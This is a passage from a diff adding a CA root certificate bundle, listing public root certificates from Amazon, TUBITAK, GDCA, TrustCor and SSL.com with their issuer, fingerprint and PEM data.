+MQswCQYDVQQGEwJVUzEPMA0GA1UEChMGQW1hem9uMRkwFwYDVQQDExBBbWF6b24g +Um9vdCBDQSA0MB4XDTE1MDUyNjAwMDAwMFoXDTQwMDUyNjAwMDAwMFowOTELMAkG +A1UEBhMCVVMxDzANBgNVBAoTBkFtYXpvbjEZMBcGA1UEAxMQQW1hem9uIFJvb3Qg +Q0EgNDB2MBAGByqGSM49AgEGBSuBBAAiA2IABNKrijdPo1MN/sGKe0uoe0ZLY7Bi +9i0b2whxIdIA6GO9mif78DluXeo9pcmBqqNbIJhFXRbb/egQbeOc4OO9X4Ri83Bk +M6DLJC9wuoihKqB1+IGuYgbEgds5bimwHvouXKNCMEAwDwYDVR0TAQH/BAUwAwEB +/zAOBgNVHQ8BAf8EBAMCAYYwHQYDVR0OBBYEFNPsxzplbszh2naaVvuc84ZtV+WB +MAoGCCqGSM49BAMDA2gAMGUCMDqLIfG9fhGt0O9Yli/W651+kI0rz2ZVwyzjKKlw +CkcO8DdZEv8tmZQoTipPNU0zWgIxAOp1AE47xDqUEpHJWEadIRNyp4iciuRMStuW +1KyLa2tJElMzrdfkviT8tQp21KW8EA== +-----END CERTIFICATE----- + +# Issuer: CN=TUBITAK Kamu SM SSL Kok Sertifikasi - Surum 1 O=Turkiye Bilimsel ve Teknolojik Arastirma Kurumu - TUBITAK OU=Kamu Sertifikasyon Merkezi - Kamu SM +# Subject: CN=TUBITAK Kamu SM SSL Kok Sertifikasi - Surum 1 O=Turkiye Bilimsel ve Teknolojik Arastirma Kurumu - TUBITAK OU=Kamu Sertifikasyon Merkezi - Kamu SM +# Label: "TUBITAK Kamu SM SSL Kok Sertifikasi - Surum 1" +# Serial: 1 +# MD5 Fingerprint: dc:00:81:dc:69:2f:3e:2f:b0:3b:f6:3d:5a:91:8e:49 +# SHA1 Fingerprint: 31:43:64:9b:ec:ce:27:ec:ed:3a:3f:0b:8f:0d:e4:e8:91:dd:ee:ca +# SHA256 Fingerprint: 46:ed:c3:68:90:46:d5:3a:45:3f:b3:10:4a:b8:0d:ca:ec:65:8b:26:60:ea:16:29:dd:7e:86:79:90:64:87:16 +-----BEGIN CERTIFICATE----- +MIIEYzCCA0ugAwIBAgIBATANBgkqhkiG9w0BAQsFADCB0jELMAkGA1UEBhMCVFIx +GDAWBgNVBAcTD0dlYnplIC0gS29jYWVsaTFCMEAGA1UEChM5VHVya2l5ZSBCaWxp +bXNlbCB2ZSBUZWtub2xvamlrIEFyYXN0aXJtYSBLdXJ1bXUgLSBUVUJJVEFLMS0w +KwYDVQQLEyRLYW11IFNlcnRpZmlrYXN5b24gTWVya2V6aSAtIEthbXUgU00xNjA0 +BgNVBAMTLVRVQklUQUsgS2FtdSBTTSBTU0wgS29rIFNlcnRpZmlrYXNpIC0gU3Vy +dW0gMTAeFw0xMzExMjUwODI1NTVaFw00MzEwMjUwODI1NTVaMIHSMQswCQYDVQQG +EwJUUjEYMBYGA1UEBxMPR2ViemUgLSBLb2NhZWxpMUIwQAYDVQQKEzlUdXJraXll +IEJpbGltc2VsIHZlIFRla25vbG9qaWsgQXJhc3Rpcm1hIEt1cnVtdSAtIFRVQklU +QUsxLTArBgNVBAsTJEthbXUgU2VydGlmaWthc3lvbiBNZXJrZXppIC0gS2FtdSBT +TTE2MDQGA1UEAxMtVFVCSVRBSyBLYW11IFNNIFNTTCBLb2sgU2VydGlmaWthc2kg +LSBTdXJ1bSAxMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAr3UwM6q7 +a9OZLBI3hNmNe5eA027n/5tQlT6QlVZC1xl8JoSNkvoBHToP4mQ4t4y86Ij5iySr +LqP1N+RAjhgleYN1Hzv/bKjFxlb4tO2KRKOrbEz8HdDc72i9z+SqzvBV96I01INr +N3wcwv61A+xXzry0tcXtAA9TNypN9E8Mg/uGz8v+jE69h/mniyFXnHrfA2eJLJ2X +YacQuFWQfw4tJzh03+f92k4S400VIgLI4OD8D62K18lUUMw7D8oWgITQUVbDjlZ/ +iSIzL+aFCr2lqBs23tPcLG07xxO9WSMs5uWk99gL7eqQQESolbuT1dCANLZGeA4f +AJNG4e7p+exPFwIDAQABo0IwQDAdBgNVHQ4EFgQUZT/HiobGPN08VFw1+DrtUgxH +V8gwDgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQEL +BQADggEBACo/4fEyjq7hmFxLXs9rHmoJ0iKpEsdeV31zVmSAhHqT5Am5EM2fKifh +AHe+SMg1qIGf5LgsyX8OsNJLN13qudULXjS99HMpw+0mFZx+CFOKWI3QSyjfwbPf +IPP54+M638yclNhOT8NrF7f3cuitZjO1JVOr4PhMqZ398g26rrnZqsZr+ZO7rqu4 +lzwDGrpDxpa5RXI4s6ehlj2Re37AIVNMh+3yC1SVUZPVIqUNivGTDj5UDrDYyU7c +8jEyVupk+eq1nRZmQnLzf9OxMUP8pI4X8W0jq5Rm+K37DwhuJi1/FwcJsoz7UMCf +lo3Ptv0AnVoUmr8CRPXBwp8iXqIPoeM= +-----END CERTIFICATE----- + +# Issuer: CN=GDCA TrustAUTH R5 ROOT O=GUANG DONG CERTIFICATE AUTHORITY CO.,LTD. +# Subject: CN=GDCA TrustAUTH R5 ROOT O=GUANG DONG CERTIFICATE AUTHORITY CO.,LTD. +# Label: "GDCA TrustAUTH R5 ROOT" +# Serial: 9009899650740120186 +# MD5 Fingerprint: 63:cc:d9:3d:34:35:5c:6f:53:a3:e2:08:70:48:1f:b4 +# SHA1 Fingerprint: 0f:36:38:5b:81:1a:25:c3:9b:31:4e:83:ca:e9:34:66:70:cc:74:b4 +# SHA256 Fingerprint: bf:ff:8f:d0:44:33:48:7d:6a:8a:a6:0c:1a:29:76:7a:9f:c2:bb:b0:5e:42:0f:71:3a:13:b9:92:89:1d:38:93 +-----BEGIN CERTIFICATE----- +MIIFiDCCA3CgAwIBAgIIfQmX/vBH6nowDQYJKoZIhvcNAQELBQAwYjELMAkGA1UE +BhMCQ04xMjAwBgNVBAoMKUdVQU5HIERPTkcgQ0VSVElGSUNBVEUgQVVUSE9SSVRZ +IENPLixMVEQuMR8wHQYDVQQDDBZHRENBIFRydXN0QVVUSCBSNSBST09UMB4XDTE0 +MTEyNjA1MTMxNVoXDTQwMTIzMTE1NTk1OVowYjELMAkGA1UEBhMCQ04xMjAwBgNV +BAoMKUdVQU5HIERPTkcgQ0VSVElGSUNBVEUgQVVUSE9SSVRZIENPLixMVEQuMR8w +HQYDVQQDDBZHRENBIFRydXN0QVVUSCBSNSBST09UMIICIjANBgkqhkiG9w0BAQEF +AAOCAg8AMIICCgKCAgEA2aMW8Mh0dHeb7zMNOwZ+Vfy1YI92hhJCfVZmPoiC7XJj +Dp6L3TQsAlFRwxn9WVSEyfFrs0yw6ehGXTjGoqcuEVe6ghWinI9tsJlKCvLriXBj +TnnEt1u9ol2x8kECK62pOqPseQrsXzrj/e+APK00mxqriCZ7VqKChh/rNYmDf1+u +KU49tm7srsHwJ5uu4/Ts765/94Y9cnrrpftZTqfrlYwiOXnhLQiPzLyRuEH3FMEj +qcOtmkVEs7LXLM3GKeJQEK5cy4KOFxg2fZfmiJqwTTQJ9Cy5WmYqsBebnh52nUpm +MUHfP/vFBu8btn4aRjb3ZGM74zkYI+dndRTVdVeSN72+ahsmUPI2JgaQxXABZG12 +ZuGR224HwGGALrIuL4xwp9E7PLOR5G62xDtw8mySlwnNR30YwPO7ng/Wi64HtloP +zgsMR6flPri9fcebNaBhlzpBdRfMK5Z3KpIhHtmVdiBnaM8Nvd/WHwlqmuLMc3Gk +L30SgLdTMEZeS1SZD2fJpcjyIMGC7J0R38IC+xo70e0gmu9lZJIQDSri3nDxGGeC +jGHeuLzRL5z7D9Ar7Rt2ueQ5Vfj4oR24qoAATILnsn8JuLwwoC8N9VKejveSswoA +HQBUlwbgsQfZxw9cZX08bVlX5O2ljelAU58VS6Bx9hoh49pwBiFYFIeFd3mqgnkC +AwEAAaNCMEAwHQYDVR0OBBYEFOLJQJ9NzuiaoXzPDj9lxSmIahlRMA8GA1UdEwEB +/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgGGMA0GCSqGSIb3DQEBCwUAA4ICAQDRSVfg +p8xoWLoBDysZzY2wYUWsEe1jUGn4H3++Fo/9nesLqjJHdtJnJO29fDMylyrHBYZm +DRd9FBUb1Ov9H5r2XpdptxolpAqzkT9fNqyL7FeoPueBihhXOYV0GkLH6VsTX4/5 +COmSdI31R9KrO9b7eGZONn356ZLpBN79SWP8bfsUcZNnL0dKt7n/HipzcEYwv1ry +L3ml4Y0M2fmyYzeMN2WFcGpcWwlyua1jPLHd+PwyvzeG5LuOmCd+uh8W4XAR8gPf +JWIyJyYYMoSf/wA6E7qaTfRPuBRwIrHKK5DOKcFw9C+df/KQHtZa37dG/OaG+svg +IHZ6uqbL9XzeYqWxi+7egmaKTjowHz+Ay60nugxe19CxVsp3cbK1daFQqUBDF8Io +2c9Si1vIY9RCPqAzekYu9wogRlR+ak8x8YF+QnQ4ZXMn7sZ8uI7XpTrXmKGcjBBV +09tL7ECQ8s1uV9JiDnxXk7Gnbc2dg7sq5+W2O3FYrf3RRbxake5TFW/TRQl1brqQ +XR4EzzffHqhmsYzmIGrv/EhOdJhCrylvLmrH+33RZjEizIYAfmaDDEL0vTSSwxrq +T8p+ck0LcIymSLumoRT2+1hEmRSuqguTaaApJUqlyyvdimYHFngVV3Eb7PVHhPOe +MTd61X8kreS8/f3MboPoDKi3QWwH3b08hpcv0g== +-----END CERTIFICATE----- + +# Issuer: CN=TrustCor RootCert CA-1 O=TrustCor Systems S. de R.L. OU=TrustCor Certificate Authority +# Subject: CN=TrustCor RootCert CA-1 O=TrustCor Systems S. de R.L. OU=TrustCor Certificate Authority +# Label: "TrustCor RootCert CA-1" +# Serial: 15752444095811006489 +# MD5 Fingerprint: 6e:85:f1:dc:1a:00:d3:22:d5:b2:b2:ac:6b:37:05:45 +# SHA1 Fingerprint: ff:bd:cd:e7:82:c8:43:5e:3c:6f:26:86:5c:ca:a8:3a:45:5b:c3:0a +# SHA256 Fingerprint: d4:0e:9c:86:cd:8f:e4:68:c1:77:69:59:f4:9e:a7:74:fa:54:86:84:b6:c4:06:f3:90:92:61:f4:dc:e2:57:5c +-----BEGIN CERTIFICATE----- +MIIEMDCCAxigAwIBAgIJANqb7HHzA7AZMA0GCSqGSIb3DQEBCwUAMIGkMQswCQYD +VQQGEwJQQTEPMA0GA1UECAwGUGFuYW1hMRQwEgYDVQQHDAtQYW5hbWEgQ2l0eTEk +MCIGA1UECgwbVHJ1c3RDb3IgU3lzdGVtcyBTLiBkZSBSLkwuMScwJQYDVQQLDB5U +cnVzdENvciBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkxHzAdBgNVBAMMFlRydXN0Q29y +IFJvb3RDZXJ0IENBLTEwHhcNMTYwMjA0MTIzMjE2WhcNMjkxMjMxMTcyMzE2WjCB +pDELMAkGA1UEBhMCUEExDzANBgNVBAgMBlBhbmFtYTEUMBIGA1UEBwwLUGFuYW1h +IENpdHkxJDAiBgNVBAoMG1RydXN0Q29yIFN5c3RlbXMgUy4gZGUgUi5MLjEnMCUG +A1UECwweVHJ1c3RDb3IgQ2VydGlmaWNhdGUgQXV0aG9yaXR5MR8wHQYDVQQDDBZU +cnVzdENvciBSb290Q2VydCBDQS0xMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB +CgKCAQEAv463leLCJhJrMxnHQFgKq1mqjQCj/IDHUHuO1CAmujIS2CNUSSUQIpid +RtLByZ5OGy4sDjjzGiVoHKZaBeYei0i/mJZ0PmnK6bV4pQa81QBeCQryJ3pS/C3V +seq0iWEk8xoT26nPUu0MJLq5nux+AHT6k61sKZKuUbS701e/s/OojZz0JEsq1pme +9J7+wH5COucLlVPat2gOkEz7cD+PSiyU8ybdY2mplNgQTsVHCJCZGxdNuWxu72CV +EY4hgLW9oHPY0LJ3xEXqWib7ZnZ2+AYfYW0PVcWDtxBWcgYHpfOxGgMFZA6dWorW +hnAbJN7+KIor0Gqw/Hqi3LJ5DotlDwIDAQABo2MwYTAdBgNVHQ4EFgQU7mtJPHo/ +DeOxCbeKyKsZn3MzUOcwHwYDVR0jBBgwFoAU7mtJPHo/DeOxCbeKyKsZn3MzUOcw +DwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAYYwDQYJKoZIhvcNAQELBQAD +ggEBACUY1JGPE+6PHh0RU9otRCkZoB5rMZ5NDp6tPVxBb5UrJKF5mDo4Nvu7Zp5I +/5CQ7z3UuJu0h3U/IJvOcs+hVcFNZKIZBqEHMwwLKeXx6quj7LUKdJDHfXLy11yf +ke+Ri7fc7Waiz45mO7yfOgLgJ90WmMCV1Aqk5IGadZQ1nJBfiDcGrVmVCrDRZ9MZ +yonnMlo2HD6CqFqTvsbQZJG2z9m2GM/bftJlo6bEjhcxwft+dtvTheNYsnd6djts +L1Ac59v2Z3kf9YKVmgenFK+P3CghZwnS1k1aHBkcjndcw5QkPTJrS37UeJSDvjdN +zl/HHk484IkzlQsPpTLWPFp5LBk= +-----END CERTIFICATE----- + +# Issuer: CN=TrustCor RootCert CA-2 O=TrustCor Systems S. de R.L. OU=TrustCor Certificate Authority +# Subject: CN=TrustCor RootCert CA-2 O=TrustCor Systems S. de R.L. OU=TrustCor Certificate Authority +# Label: "TrustCor RootCert CA-2" +# Serial: 2711694510199101698 +# MD5 Fingerprint: a2:e1:f8:18:0b:ba:45:d5:c7:41:2a:bb:37:52:45:64 +# SHA1 Fingerprint: b8:be:6d:cb:56:f1:55:b9:63:d4:12:ca:4e:06:34:c7:94:b2:1c:c0 +# SHA256 Fingerprint: 07:53:e9:40:37:8c:1b:d5:e3:83:6e:39:5d:ae:a5:cb:83:9e:50:46:f1:bd:0e:ae:19:51:cf:10:fe:c7:c9:65 +-----BEGIN CERTIFICATE----- +MIIGLzCCBBegAwIBAgIIJaHfyjPLWQIwDQYJKoZIhvcNAQELBQAwgaQxCzAJBgNV +BAYTAlBBMQ8wDQYDVQQIDAZQYW5hbWExFDASBgNVBAcMC1BhbmFtYSBDaXR5MSQw +IgYDVQQKDBtUcnVzdENvciBTeXN0ZW1zIFMuIGRlIFIuTC4xJzAlBgNVBAsMHlRy +dXN0Q29yIENlcnRpZmljYXRlIEF1dGhvcml0eTEfMB0GA1UEAwwWVHJ1c3RDb3Ig +Um9vdENlcnQgQ0EtMjAeFw0xNjAyMDQxMjMyMjNaFw0zNDEyMzExNzI2MzlaMIGk +MQswCQYDVQQGEwJQQTEPMA0GA1UECAwGUGFuYW1hMRQwEgYDVQQHDAtQYW5hbWEg +Q2l0eTEkMCIGA1UECgwbVHJ1c3RDb3IgU3lzdGVtcyBTLiBkZSBSLkwuMScwJQYD +VQQLDB5UcnVzdENvciBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkxHzAdBgNVBAMMFlRy +dXN0Q29yIFJvb3RDZXJ0IENBLTIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIK +AoICAQCnIG7CKqJiJJWQdsg4foDSq8GbZQWU9MEKENUCrO2fk8eHyLAnK0IMPQo+ +QVqedd2NyuCb7GgypGmSaIwLgQ5WoD4a3SwlFIIvl9NkRvRUqdw6VC0xK5mC8tkq +1+9xALgxpL56JAfDQiDyitSSBBtlVkxs1Pu2YVpHI7TYabS3OtB0PAx1oYxOdqHp +2yqlO/rOsP9+aij9JxzIsekp8VduZLTQwRVtDr4uDkbIXvRR/u8OYzo7cbrPb1nK +DOObXUm4TOJXsZiKQlecdu/vvdFoqNL0Cbt3Nb4lggjEFixEIFapRBF37120Hape +az6LMvYHL1cEksr1/p3C6eizjkxLAjHZ5DxIgif3GIJ2SDpxsROhOdUuxTTCHWKF +3wP+TfSvPd9cW436cOGlfifHhi5qjxLGhF5DUVCcGZt45vz27Ud+ez1m7xMTiF88 +oWP7+ayHNZ/zgp6kPwqcMWmLmaSISo5uZk3vFsQPeSghYA2FFn3XVDjxklb9tTNM +g9zXEJ9L/cb4Qr26fHMC4P99zVvh1Kxhe1fVSntb1IVYJ12/+CtgrKAmrhQhJ8Z3 +mjOAPF5GP/fDsaOGM8boXg25NSyqRsGFAnWAoOsk+xWq5Gd/bnc/9ASKL3x74xdh +8N0JqSDIvgmk0H5Ew7IwSjiqqewYmgeCK9u4nBit2uBGF6zPXQIDAQABo2MwYTAd +BgNVHQ4EFgQU2f4hQG6UnrybPZx9mCAZ5YwwYrIwHwYDVR0jBBgwFoAU2f4hQG6U +nrybPZx9mCAZ5YwwYrIwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAYYw +DQYJKoZIhvcNAQELBQADggIBAJ5Fngw7tu/hOsh80QA9z+LqBrWyOrsGS2h60COX +dKcs8AjYeVrXWoSK2BKaG9l9XE1wxaX5q+WjiYndAfrs3fnpkpfbsEZC89NiqpX+ +MWcUaViQCqoL7jcjx1BRtPV+nuN79+TMQjItSQzL/0kMmx40/W5ulop5A7Zv2wnL +/V9lFDfhOPXzYRZY5LVtDQsEGz9QLX+zx3oaFoBg+Iof6Rsqxvm6ARppv9JYx1RX +CI/hOWB3S6xZhBqI8d3LT3jX5+EzLfzuQfogsL7L9ziUwOHQhQ+77Sxzq+3+knYa +ZH9bDTMJBzN7Bj8RpFxwPIXAz+OQqIN3+tvmxYxoZxBnpVIt8MSZj3+/0WvitUfW +2dCFmU2Umw9Lje4AWkcdEQOsQRivh7dvDDqPys/cA8GiCcjl/YBeyGBCARsaU1q7 +N6a3vLqE6R5sGtRk2tRD/pOLS/IseRYQ1JMLiI+h2IYURpFHmygk71dSTlxCnKr3 +Sewn6EAes6aJInKc9Q0ztFijMDvd1GpUk74aTfOTlPf8hAs/hCBcNANExdqtvArB +As8e5ZTZ845b2EzwnexhF7sUMlQMAimTHpKG9n/v55IFDlndmQguLvqcAFLTxWYp +5KeXRKQOKIETNcX2b2TmQcTVL8w0RSXPQQCWPUouwpaYT05KnJe32x+SMsj/D1Fu +1uwJ +-----END CERTIFICATE----- + +# Issuer: CN=TrustCor ECA-1 O=TrustCor Systems S. de R.L. OU=TrustCor Certificate Authority +# Subject: CN=TrustCor ECA-1 O=TrustCor Systems S. de R.L. OU=TrustCor Certificate Authority +# Label: "TrustCor ECA-1" +# Serial: 9548242946988625984 +# MD5 Fingerprint: 27:92:23:1d:0a:f5:40:7c:e9:e6:6b:9d:d8:f5:e7:6c +# SHA1 Fingerprint: 58:d1:df:95:95:67:6b:63:c0:f0:5b:1c:17:4d:8b:84:0b:c8:78:bd +# SHA256 Fingerprint: 5a:88:5d:b1:9c:01:d9:12:c5:75:93:88:93:8c:af:bb:df:03:1a:b2:d4:8e:91:ee:15:58:9b:42:97:1d:03:9c +-----BEGIN CERTIFICATE----- +MIIEIDCCAwigAwIBAgIJAISCLF8cYtBAMA0GCSqGSIb3DQEBCwUAMIGcMQswCQYD +VQQGEwJQQTEPMA0GA1UECAwGUGFuYW1hMRQwEgYDVQQHDAtQYW5hbWEgQ2l0eTEk +MCIGA1UECgwbVHJ1c3RDb3IgU3lzdGVtcyBTLiBkZSBSLkwuMScwJQYDVQQLDB5U +cnVzdENvciBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkxFzAVBgNVBAMMDlRydXN0Q29y +IEVDQS0xMB4XDTE2MDIwNDEyMzIzM1oXDTI5MTIzMTE3MjgwN1owgZwxCzAJBgNV +BAYTAlBBMQ8wDQYDVQQIDAZQYW5hbWExFDASBgNVBAcMC1BhbmFtYSBDaXR5MSQw +IgYDVQQKDBtUcnVzdENvciBTeXN0ZW1zIFMuIGRlIFIuTC4xJzAlBgNVBAsMHlRy +dXN0Q29yIENlcnRpZmljYXRlIEF1dGhvcml0eTEXMBUGA1UEAwwOVHJ1c3RDb3Ig +RUNBLTEwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDPj+ARtZ+odnbb +3w9U73NjKYKtR8aja+3+XzP4Q1HpGjORMRegdMTUpwHmspI+ap3tDvl0mEDTPwOA +BoJA6LHip1GnHYMma6ve+heRK9jGrB6xnhkB1Zem6g23xFUfJ3zSCNV2HykVh0A5 +3ThFEXXQmqc04L/NyFIduUd+Dbi7xgz2c1cWWn5DkR9VOsZtRASqnKmcp0yJF4Ou +owReUoCLHhIlERnXDH19MURB6tuvsBzvgdAsxZohmz3tQjtQJvLsznFhBmIhVE5/ +wZ0+fyCMgMsq2JdiyIMzkX2woloPV+g7zPIlstR8L+xNxqE6FXrntl019fZISjZF +ZtS6mFjBAgMBAAGjYzBhMB0GA1UdDgQWBBREnkj1zG1I1KBLf/5ZJC+Dl5mahjAf +BgNVHSMEGDAWgBREnkj1zG1I1KBLf/5ZJC+Dl5mahjAPBgNVHRMBAf8EBTADAQH/ +MA4GA1UdDwEB/wQEAwIBhjANBgkqhkiG9w0BAQsFAAOCAQEABT41XBVwm8nHc2Fv +civUwo/yQ10CzsSUuZQRg2dd4mdsdXa/uwyqNsatR5Nj3B5+1t4u/ukZMjgDfxT2 +AHMsWbEhBuH7rBiVDKP/mZb3Kyeb1STMHd3BOuCYRLDE5D53sXOpZCz2HAF8P11F +hcCF5yWPldwX8zyfGm6wyuMdKulMY/okYWLW2n62HGz1Ah3UKt1VkOsqEUc8Ll50 +soIipX1TH0XsJ5F95yIW6MBoNtjG8U+ARDL54dHRHareqKucBK+tIA5kmE2la8BI +WJZpTdwHjFGTot+fDz2LYLSCjaoITmJF4PkL0uDgPFveXHEnJcLmA4GLEFPjx1Wi +tJ/X5g== +-----END CERTIFICATE----- + +# Issuer: CN=SSL.com Root Certification Authority RSA O=SSL Corporation +# Subject: CN=SSL.com Root Certification Authority RSA O=SSL Corporation +# Label: "SSL.com Root Certification Authority RSA" +# Serial: 8875640296558310041 +# MD5 Fingerprint: 86:69:12:c0:70:f1:ec:ac:ac:c2:d5:bc:a5:5b:a1:29 +# SHA1 Fingerprint: b7:ab:33:08:d1:ea:44:77:ba:14:80:12:5a:6f:bd:a9:36:49:0c:bb +# SHA256 Fingerprint: 85:66:6a:56:2e:e0:be:5c:e9:25:c1:d8:89:0a:6f:76:a8:7e:c1:6d:4d:7d:5f:29:ea:74:19:cf:20:12:3b:69 +-----BEGIN CERTIFICATE----- +MIIF3TCCA8WgAwIBAgIIeyyb0xaAMpkwDQYJKoZIhvcNAQELBQAwfDELMAkGA1UE +BhMCVVMxDjAMBgNVBAgMBVRleGFzMRAwDgYDVQQHDAdIb3VzdG9uMRgwFgYDVQQK +DA9TU0wgQ29ycG9yYXRpb24xMTAvBgNVBAMMKFNTTC5jb20gUm9vdCBDZXJ0aWZp +Y2F0aW9uIEF1dGhvcml0eSBSU0EwHhcNMTYwMjEyMTczOTM5WhcNNDEwMjEyMTcz +OTM5WjB8MQswCQYDVQQGEwJVUzEOMAwGA1UECAwFVGV4YXMxEDAOBgNVBAcMB0hv +dXN0b24xGDAWBgNVBAoMD1NTTCBDb3Jwb3JhdGlvbjExMC8GA1UEAwwoU1NMLmNv +bSBSb290IENlcnRpZmljYXRpb24gQXV0aG9yaXR5IFJTQTCCAiIwDQYJKoZIhvcN +AQEBBQADggIPADCCAgoCggIBAPkP3aMrfcvQKv7sZ4Wm5y4bunfh4/WvpOz6Sl2R +xFdHaxh3a3by/ZPkPQ/CFp4LZsNWlJ4Xg4XOVu/yFv0AYvUiCVToZRdOQbngT0aX +qhvIuG5iXmmxX9sqAn78bMrzQdjt0Oj8P2FI7bADFB0QDksZ4LtO7IZl/zbzXmcC +C52GVWH9ejjt/uIZALdvoVBidXQ8oPrIJZK0bnoix/geoeOy3ZExqysdBP+lSgQ3 +6YWkMyv94tZVNHwZpEpox7Ko07fKoZOI68GXvIz5HdkihCR0xwQ9aqkpk8zruFvh +/l8lqjRYyMEjVJ0bmBHDOJx+PYZspQ9AhnwC9FwCTyjLrnGfDzrIM/4RJTXq/LrF +YD3ZfBjVsqnTdXgDciLKOsMf7yzlLqn6niy2UUb9rwPW6mBo6oUWNmuF6R7As93E +JNyAKoFBbZQ+yODJgUEAnl6/f8UImKIYLEJAs/lvOCdLToD0PYFH4Ih86hzOtXVc +US4cK38acijnALXRdMbX5J+tB5O2UzU1/Dfkw/ZdFr4hc96SCvigY2q8lpJqPvi8 +ZVWb3vUNiSYE/CUapiVpy8JtynziWV+XrOvvLsi81xtZPCvM8hnIk2snYxnP/Okm ++Mpxm3+T/jRnhE6Z6/yzeAkzcLpmpnbtG3PrGqUNxCITIJRWCk4sbE6x/c+cCbqi +M+2HAgMBAAGjYzBhMB0GA1UdDgQWBBTdBAkHovV6fVJTEpKV7jiAJQ2mWTAPBgNV +HRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFN0ECQei9Xp9UlMSkpXuOIAlDaZZMA4G +A1UdDwEB/wQEAwIBhjANBgkqhkiG9w0BAQsFAAOCAgEAIBgRlCn7Jp0cHh5wYfGV +cpNxJK1ok1iOMq8bs3AD/CUrdIWQPXhq9LmLpZc7tRiRux6n+UBbkflVma8eEdBc +Hadm47GUBwwyOabqG7B52B2ccETjit3E+ZUfijhDPwGFpUenPUayvOUiaPd7nNgs +PgohyC0zrL/FgZkxdMF1ccW+sfAjRfSda/wZY52jvATGGAslu1OJD7OAUN5F7kR/ +q5R4ZJjT9ijdh9hwZXT7DrkT66cPYakylszeu+1jTBi7qUD3oFRuIIhxdRjqerQ0 +cuAjJ3dctpDqhiVAq+8zD8ufgr6iIPv2tS0a5sKFsXQP+8hlAqRSAUfdSSLBv9jr +a6x+3uxjMxW3IwiPxg+NQVrdjsW5j+VFP3jbutIbQLH+cU0/4IGiul607BXgk90I +H37hVZkLId6Tngr75qNJvTYw/ud3sqB1l7UtgYgXZSD32pAAn8lSzDLKNXz1PQ/Y +K9f1JmzJBjSWFupwWRoyeXkLtoh/D1JIPb9s2KJELtFOt3JY04kTlf5Eq/jXixtu +nLwsoFvVagCvXzfh1foQC5ichucmj87w7G6KVwuA406ywKBjYZC6VWg3dGq2ktuf +oYYitmUnDuy2n0Jg5GfCtdpBC8TTi2EbvPofkSvXRAdeuims2cXp71NIWuuA8ShY +Ic2wBlX7Jz9TkHCpBB5XJ7k= +-----END CERTIFICATE----- + +# Issuer: CN=SSL.com Root Certification Authority ECC O=SSL Corporation +# Subject: CN=SSL.com Root Certification Authority ECC O=SSL Corporation +# Label: "SSL.com Root Certification Authority ECC" +# Serial: 8495723813297216424 +# MD5 Fingerprint: 2e:da:e4:39:7f:9c:8f:37:d1:70:9f:26:17:51:3a:8e +# SHA1 Fingerprint: c3:19:7c:39:24:e6:54:af:1b:c4:ab:20:95:7a:e2:c3:0e:13:02:6a +# SHA256 Fingerprint: 34:17:bb:06:cc:60:07:da:1b:96:1c:92:0b:8a:b4:ce:3f:ad:82:0e:4a:a3:0b:9a:cb:c4:a7:4e:bd:ce:bc:65 +-----BEGIN CERTIFICATE----- +MIICjTCCAhSgAwIBAgIIdebfy8FoW6gwCgYIKoZIzj0EAwIwfDELMAkGA1UEBhMC +VVMxDjAMBgNVBAgMBVRleGFzMRAwDgYDVQQHDAdIb3VzdG9uMRgwFgYDVQQKDA9T +U0wgQ29ycG9yYXRpb24xMTAvBgNVBAMMKFNTTC5jb20gUm9vdCBDZXJ0aWZpY2F0 +aW9uIEF1dGhvcml0eSBFQ0MwHhcNMTYwMjEyMTgxNDAzWhcNNDEwMjEyMTgxNDAz +WjB8MQswCQYDVQQGEwJVUzEOMAwGA1UECAwFVGV4YXMxEDAOBgNVBAcMB0hvdXN0 +b24xGDAWBgNVBAoMD1NTTCBDb3Jwb3JhdGlvbjExMC8GA1UEAwwoU1NMLmNvbSBS +b290IENlcnRpZmljYXRpb24gQXV0aG9yaXR5IEVDQzB2MBAGByqGSM49AgEGBSuB +BAAiA2IABEVuqVDEpiM2nl8ojRfLliJkP9x6jh3MCLOicSS6jkm5BBtHllirLZXI +7Z4INcgn64mMU1jrYor+8FsPazFSY0E7ic3s7LaNGdM0B9y7xgZ/wkWV7Mt/qCPg +CemB+vNH06NjMGEwHQYDVR0OBBYEFILRhXMw5zUE044CkvvlpNHEIejNMA8GA1Ud +EwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAUgtGFczDnNQTTjgKS++Wk0cQh6M0wDgYD +VR0PAQH/BAQDAgGGMAoGCCqGSM49BAMCA2cAMGQCMG/n61kRpGDPYbCWe+0F+S8T +kdzt5fxQaxFGRrMcIQBiu77D5+jNB5n5DQtdcj7EqgIwH7y6C+IwJPt8bYBVCpk+ +gA0z5Wajs6O7pdWLjwkspl1+4vAHCGht0nxpbl/f5Wpl +-----END CERTIFICATE----- + +# Issuer: CN=SSL.com EV Root Certification Authority RSA R2 O=SSL Corporation +# Subject: CN=SSL.com EV Root Certification Authority RSA R2 O=SSL Corporation +# Label: "SSL.com EV Root Certification Authority RSA R2" +# Serial: 6248227494352943350 +# MD5 Fingerprint: e1:1e:31:58:1a:ae:54:53:02:f6:17:6a:11:7b:4d:95 +# SHA1 Fingerprint: 74:3a:f0:52:9b:d0:32:a0:f4:4a:83:cd:d4:ba:a9:7b:7c:2e:c4:9a +# SHA256 Fingerprint: 2e:7b:f1:6c:c2:24:85:a7:bb:e2:aa:86:96:75:07:61:b0:ae:39:be:3b:2f:e9:d0:cc:6d:4e:f7:34:91:42:5c +-----BEGIN CERTIFICATE----- +MIIF6zCCA9OgAwIBAgIIVrYpzTS8ePYwDQYJKoZIhvcNAQELBQAwgYIxCzAJBgNV +BAYTAlVTMQ4wDAYDVQQIDAVUZXhhczEQMA4GA1UEBwwHSG91c3RvbjEYMBYGA1UE 